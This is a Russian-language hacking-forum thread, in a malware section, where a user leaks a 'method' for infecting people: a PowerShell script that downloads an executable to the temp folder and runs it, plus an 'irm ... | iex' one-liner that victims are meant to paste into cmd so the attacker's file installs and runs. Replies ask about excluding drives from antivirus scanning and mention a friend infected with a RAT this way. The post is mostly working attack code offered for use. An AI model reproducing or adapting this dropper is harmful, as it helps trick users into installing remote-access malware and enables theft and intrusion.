Загрузка...

Грузим файлы через cmd и запускаем их

Тема в разделе Вирусология создана пользователем DCRAT 28 мар 2024. 938 просмотров

Загрузка...
  1. DCRAT
    DCRAT Автор темы 28 мар 2024 Заблокирован(а) 7 30 окт 2023
    Привет бандиты, не давно скинули тг канал школьников который продавали за 500 вечно деревянных рублей это чудо, я хочу слить это в паблик так как это вообще не должно нечего стоить, это можно сделать умея гуглить и юзать gpt

    как это чудо работает ? всё до ужаса просто powershell получает другой powershell скрипт по ссылки и запускает его

    что нужно чтобы это сделать ?
    1)нужен хост или тотже pastebin или github
    2) пару минут свободного времени
    3)руки (по желению)

    заходи на хост или pastebin или github и вставляем туда данный код
    Код
    powershell -c (New-Object System.Net.WebClient).DownloadFile('link_to_file', "$env:TEMP\file_name.exe")
    Start-Process "$env:TEMP\file_name.exe"
    exit
    вам тут надо заменить лишь две вещи это file_name на имя файл под которым он будет сохранятся и link_to_file на прямую ссылку на ваш файл пример(http://zelenka.guru/DCRAT.exe)

    далее сохраняем данный скрипт под любым именем допустим "zelenka", всё готово

    Код
    powershell -c irm http://zelenka.guru/zelenka | iex
    если пользователь введёт данную команду в cmd или powershell ему устоновится и запуститься ваш файл


    Кто прочитал тому спасибо :owoshy:
     
    1. andrometr
      DCRAT, а есть этому альтернатива с некриптованым файлом?) типо добавить диск с в исключения и так же эта команда
  2. Daaanchik
    Daaanchik 30 мар 2024 560 20 фев 2020
    Ввххв, интересно сколько купили ))
     
  3. asakwazaa
    asakwazaa 31 мар 2024 225 6 май 2022
    у меня друг так на ратник сел
     
  4. mezra
    mezra 17 июн 2024 Заблокирован(а) 386 10 окт 2023
    Бля, так то можно прихуярить какнибудь
     
  5. dyzevy
    dyzevy 21 июн 2024 0 14 янв 2024
    Смотри, два вопросика есть. link_to_file менять на прямую скачку файла? И на что нужно поменять ссылку которая ведёт на зелёнку (powershell -c irm ``http://zelenka.guru/zelenka`` | iex)
     
    21 июн 2024 Изменено
Top